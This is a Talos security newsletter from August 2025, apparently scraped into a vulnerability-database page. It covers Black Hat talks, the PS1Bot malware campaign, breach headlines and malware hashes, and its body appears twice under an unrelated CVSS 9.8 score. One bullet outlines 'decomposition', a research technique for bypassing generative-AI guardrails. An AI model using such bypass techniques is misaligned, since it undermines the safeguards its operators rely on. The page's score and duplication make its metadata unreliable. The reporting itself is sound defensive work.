9.8
/ 10
CRITICAL
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
Description
Welcome to this week's edition of the Threat Source newsletter.
Last week I flew 5,000 miles to Las Vegas for Black Hat USA. After navigating the casino carpet labyrinth and finding the only venue in Nevada that serves a proper English breakfast tea with milk (lifesaver), I've decided Black Hat feels exactly like trying to run in a dream -- you're always heading somewhere, never quickly, and the water costs $8.
I don't mean to complain (although, as a Brit, I'm practically obligated to file a formal grievance about the weather, tea or queue length). In truth, it was a brilliant week, and I got to watch my fellow Talosians deliver some outstanding presentations and research.
Rather than recap everything we did (our _YouTube channel_ will have plenty of research highlights soon), here are three standouts:
* **Joe Marshall 's live incident-response exercise** - Joe ran _Backdoors & Breaches_, an interactive card game originally developed with NetHope and NGO-ISAC for humanitarian non-governmental organizations. At Black Hat, he adapted it for a lunch-and-learn with over 60 participants, guiding them through a simulated cybersecurity crisis. If you're curious, you can _find the cards online here_. With a websharing tool, you can stream it to any size audience and have people play along virtually. You can also read more about Joe's experience developing the game, alongside a video walkthrough, in his _new blog post._
* **Amy Chang 's AI guardrail bypass research** - Amy's booth talk revealed a novel way to break the guardrails of generative AI by tricking it into repeating human-written content verbatim, a technique called "_decomposition. "_ Her work drew attention from media outlets including _TechRepublic_, _SecurityWeek_ and _WebProNews_.
* **Philippe Laulheret 's _ReVault_ presentation** - Philippe, from our Vulnerability Research and Discovery team, revealed vulnerabilities in embedded security chips affecting millions of laptops, potentially allowing attackers to bypass Windows login or install persistent malware. A few days ago, he published a longer version of his investigation, so you can now _read the full technical deep dive_ covering the research process and exploit breakdown.
We'll have more to share soon, including a behind-the-scenes tour of the Black Hat Network Operations Center (NOC).
## The one big thing
Cisco Talos has identified a _widespread malvertising campaign_ distributing a multi-stage malware framework Talos calls "PS1Bot," which uses PowerShell and C# modules to steal sensitive information, log keystrokes, capture screenshots, and maintain persistent access on infected systems. PS1Bot employs in-memory execution and modular updates, targeting browser credentials, cryptocurrency wallets, and more, while minimizing its footprint to evade detection. The campaign has been active and rapidly evolving throughout 2025.
### Why do I care?
Casual browsing and downloading seemingly safe files can lead to infection, putting your personal data, passwords and financial info at risk -- especially if you use cryptocurrency wallets or save passwords in browsers.
### So now what?
Be extra cautious when downloading files from search results or ads, keep your security software updated, and use dedicated password managers and security tools instead of storing sensitive info in browsers. Stay informed about evolving threats like PS1Bot, as attackers are constantly updating their tactics. Talos' _blog_ also provides Snort SIDs and ClamAV detections.
## Top security headlines of the week
**Russian government hackers said to be behind US federal court filing system hack**
The Russian government is allegedly behind the data breach affecting the U.S. court filing system known as PACER, according to The New York Times. (_TechCrunch_)
**North Korean Kimsuky hackers exposed in alleged data breach**
The North Korean state-sponsored hacking group known as Kimsuky has reportedly suffered a data breach after two hackers stole the group's data and leaked it publicly online. (_Bleeping Computer_)
**Exclusive: Brosix and Chatox promised to keep your chats secured. They didn 't.**
A researcher contacted DataBreaches after finding an unsecured backup with 155.3 GB of unique compressed files. The researcher first logged the backup as exposed in late April. (_DataBreaches_)
**Netherlands: Citrix Netscaler flaw CVE-2025-6543 exploited to breach orgs**
The Netherlands' National Cyber Security Centre (NCSC) is warning that a critical Citrix NetScaler vulnerability was exploited to breach "critical organizations" in the country. (_Bleeping Computer_)
**Russian hackers exploited WinRAR zero-day in attacks on Europe, Canada**
A Russian threat group has been observed exploiting a WinRAR zero-day vulnerability (now patched) as part of a cyberespionage campaign aimed at organizations in Europe and Canada. (_SecurityWeek_)
## Can't get enough Talos?
* ** _Microsoft Patch Tuesday for August 2025_**
Microsoft has released its monthly security update for August 2025, which includes 111 vulnerabilities affecting a range of products, including 13 that Microsoft marked as "critical".
* ** _ReVault! When your SoC turns against you … deep dive edition_**
Talos reported 5 vulnerabilities to Broadcom and Dell affecting both the ControlVault3 Firmware and its associated Windows APIs that we are calling "ReVault." 100+ models of Dell Laptops are affected by this vulnerability if left unpatched. The ReVault attack can be used as a post-compromise persistence technique that can remain even across Windows reinstalls.
* ** _The TTP:_** **_Cyber criminals brought PowerShell 1.0 to a modern ransomware fight_**
Groups like Qilin are using custom encryptors, uncommon RMM tools, and even PowerShell 1.0 (yes, from 2006) to quietly recon networks.
* ** _Cyber Analyst Series: Cybersecurity Overview and the Role of the Cybersecurity Analys_ t**
A series of videos on the profession of cybersecurity analysts made in conjunction with the Ministry of Digital Transformation of Ukraine for Diia.Education (available in English and Ukrainian languages).
## Upcoming events where you can find Talos
_BlueTeamCon_ (Sept. 4 - 7) Chicago, IL
_LABScon_ (Sept. 17 - 20) Scottsdale, AZ
_VB2025_ (Sept. 24 - 26) Berlin, Germany
## Most prevalent malware files from Talos telemetry over the past week
**SHA 256: 9f1f11a708d393e0a4109ae189bc64f1f3e312653dcf317a2bd406f18ffcc507**
MD5: 2915b3f8b703eb744fc54c81f4a9c67f
VirusTotal: _https://www.virustotal.com/gui/file/9f1f11a708d393e0a4109ae189bc64f1f3e312653dcf317a2bd406f18ffcc507_
Typical Filename: VID001.exe
Claimed Product: N/A
Detection Name: Win.Worm.Coinminer::1201
**SHA 256: c67b03c0a91eaefffd2f2c79b5c26a2648b8d3c19a22cadf35453455ff08ead0**
MD5: 8c69830a50fb85d8a794fa46643493b2
VirusTotal: _https://www.virustotal.com/gui/file/c67b03c0a91eaefffd2f2c79b5c26a2648b8d3c19a22cadf35453455ff08ead0_
Typical Filename: AAct.exe
Claimed Product: N/A
Detection Name: PUA.Win.Dropper.Generic::1201
**SHA 256: 83748e8d6f6765881f81c36efacad93c20f3296be3ff4a56f48c6aa2dcd3ac08**
MD5: 906282640ae3088481d19561c55025e4
VirusTotal: _https://www.virustotal.com/gui/file/83748e8d6f6765881f81c36efacad93c20f3296be3ff4a56f48c6aa2dcd3ac08_
Typical Filename: AAct_x64.exe
Claimed Product: N/A
Detection Name: PUA.Win.Tool.Winactivator::1201
Welcome to this week's edition of the Threat Source newsletter.
Last week I flew 5,000 miles to Las Vegas for Black Hat USA. After navigating the casino carpet labyrinth and finding the only venue in Nevada that serves a proper English breakfast tea with milk (lifesaver), I've decided Black Hat feels exactly like trying to run in a dream -- you're always heading somewhere, never quickly, and the water costs $8.
I don't mean to complain (although, as a Brit, I'm practically obligated to file a formal grievance about the weather, tea or queue length). In truth, it was a brilliant week, and I got to watch my fellow Talosians deliver some outstanding presentations and research.
Rather than recap everything we did (our _YouTube channel_ will have plenty of research highlights soon), here are three standouts:
* **Joe Marshall 's live incident-response exercise** - Joe ran _Backdoors & Breaches_, an interactive card game originally developed with NetHope and NGO-ISAC for humanitarian non-governmental organizations. At Black Hat, he adapted it for a lunch-and-learn with over 60 participants, guiding them through a simulated cybersecurity crisis. If you're curious, you can _find the cards online here_. With a websharing tool, you can stream it to any size audience and have people play along virtually. You can also read more about Joe's experience developing the game, alongside a video walkthrough, in his _new blog post._
* **Amy Chang 's AI guardrail bypass research** - Amy's booth talk revealed a novel way to break the guardrails of generative AI by tricking it into repeating human-written content verbatim, a technique called "_decomposition. "_ Her work drew attention from media outlets including _TechRepublic_, _SecurityWeek_ and _WebProNews_.
* **Philippe Laulheret 's _ReVault_ presentation** - Philippe, from our Vulnerability Research and Discovery team, revealed vulnerabilities in embedded security chips affecting millions of laptops, potentially allowing attackers to bypass Windows login or install persistent malware. A few days ago, he published a longer version of his investigation, so you can now _read the full technical deep dive_ covering the research process and exploit breakdown.
We'll have more to share soon, including a behind-the-scenes tour of the Black Hat Network Operations Center (NOC).
## The one big thing
Cisco Talos has identified a _widespread malvertising campaign_ distributing a multi-stage malware framework Talos calls "PS1Bot," which uses PowerShell and C# modules to steal sensitive information, log keystrokes, capture screenshots, and maintain persistent access on infected systems. PS1Bot employs in-memory execution and modular updates, targeting browser credentials, cryptocurrency wallets, and more, while minimizing its footprint to evade detection. The campaign has been active and rapidly evolving throughout 2025.
### Why do I care?
Casual browsing and downloading seemingly safe files can lead to infection, putting your personal data, passwords and financial info at risk -- especially if you use cryptocurrency wallets or save passwords in browsers.
### So now what?
Be extra cautious when downloading files from search results or ads, keep your security software updated, and use dedicated password managers and security tools instead of storing sensitive info in browsers. Stay informed about evolving threats like PS1Bot, as attackers are constantly updating their tactics. Talos' _blog_ also provides Snort SIDs and ClamAV detections.
## Top security headlines of the week
**Russian government hackers said to be behind US federal court filing system hack**
The Russian government is allegedly behind the data breach affecting the U.S. court filing system known as PACER, according to The New York Times. (_TechCrunch_)
**North Korean Kimsuky hackers exposed in alleged data breach**
The North Korean state-sponsored hacking group known as Kimsuky has reportedly suffered a data breach after two hackers stole the group's data and leaked it publicly online. (_Bleeping Computer_)
**Exclusive: Brosix and Chatox promised to keep your chats secured. They didn 't.**
A researcher contacted DataBreaches after finding an unsecured backup with 155.3 GB of unique compressed files. The researcher first logged the backup as exposed in late April. (_DataBreaches_)
**Netherlands: Citrix Netscaler flaw CVE-2025-6543 exploited to breach orgs**
The Netherlands' National Cyber Security Centre (NCSC) is warning that a critical Citrix NetScaler vulnerability was exploited to breach "critical organizations" in the country. (_Bleeping Computer_)
**Russian hackers exploited WinRAR zero-day in attacks on Europe, Canada**
A Russian threat group has been observed exploiting a WinRAR zero-day vulnerability (now patched) as part of a cyberespionage campaign aimed at organizations in Europe and Canada. (_SecurityWeek_)
## Can't get enough Talos?
* ** _Microsoft Patch Tuesday for August 2025_**
Microsoft has released its monthly security update for August 2025, which includes 111 vulnerabilities affecting a range of products, including 13 that Microsoft marked as "critical".
* ** _ReVault! When your SoC turns against you … deep dive edition_**
Talos reported 5 vulnerabilities to Broadcom and Dell affecting both the ControlVault3 Firmware and its associated Windows APIs that we are calling "ReVault." 100+ models of Dell Laptops are affected by this vulnerability if left unpatched. The ReVault attack can be used as a post-compromise persistence technique that can remain even across Windows reinstalls.
* ** _The TTP:_** **_Cyber criminals brought PowerShell 1.0 to a modern ransomware fight_**
Groups like Qilin are using custom encryptors, uncommon RMM tools, and even PowerShell 1.0 (yes, from 2006) to quietly recon networks.
* ** _Cyber Analyst Series: Cybersecurity Overview and the Role of the Cybersecurity Analys_ t**
A series of videos on the profession of cybersecurity analysts made in conjunction with the Ministry of Digital Transformation of Ukraine for Diia.Education (available in English and Ukrainian languages).
## Upcoming events where you can find Talos
_BlueTeamCon_ (Sept. 4 - 7) Chicago, IL
_LABScon_ (Sept. 17 - 20) Scottsdale, AZ
_VB2025_ (Sept. 24 - 26) Berlin, Germany
## Most prevalent malware files from Talos telemetry over the past week
**SHA 256: 9f1f11a708d393e0a4109ae189bc64f1f3e312653dcf317a2bd406f18ffcc507**
MD5: 2915b3f8b703eb744fc54c81f4a9c67f
VirusTotal: _https://www.virustotal.com/gui/file/9f1f11a708d393e0a4109ae189bc64f1f3e312653dcf317a2bd406f18ffcc507_
Typical Filename: VID001.exe
Claimed Product: N/A
Detection Name: Win.Worm.Coinminer::1201
**SHA 256: c67b03c0a91eaefffd2f2c79b5c26a2648b8d3c19a22cadf35453455ff08ead0**
MD5: 8c69830a50fb85d8a794fa46643493b2
VirusTotal: _https://www.virustotal.com/gui/file/c67b03c0a91eaefffd2f2c79b5c26a2648b8d3c19a22cadf35453455ff08ead0_
Typical Filename: AAct.exe
Claimed Product: N/A
Detection Name: PUA.Win.Dropper.Generic::1201
**SHA 256: 83748e8d6f6765881f81c36efacad93c20f3296be3ff4a56f48c6aa2dcd3ac08**
MD5: 906282640ae3088481d19561c55025e4
VirusTotal: _https://www.virustotal.com/gui/file/83748e8d6f6765881f81c36efacad93c20f3296be3ff4a56f48c6aa2dcd3ac08_
Typical Filename: AAct_x64.exe
Claimed Product: N/A
Detection Name: PUA.Win.Tool.Winactivator::1201
Basic Information
ID
TALOSBLOG:2E5750634BF4A53879ACA24A74E002C6
Published
Aug 14, 2025 at 18:00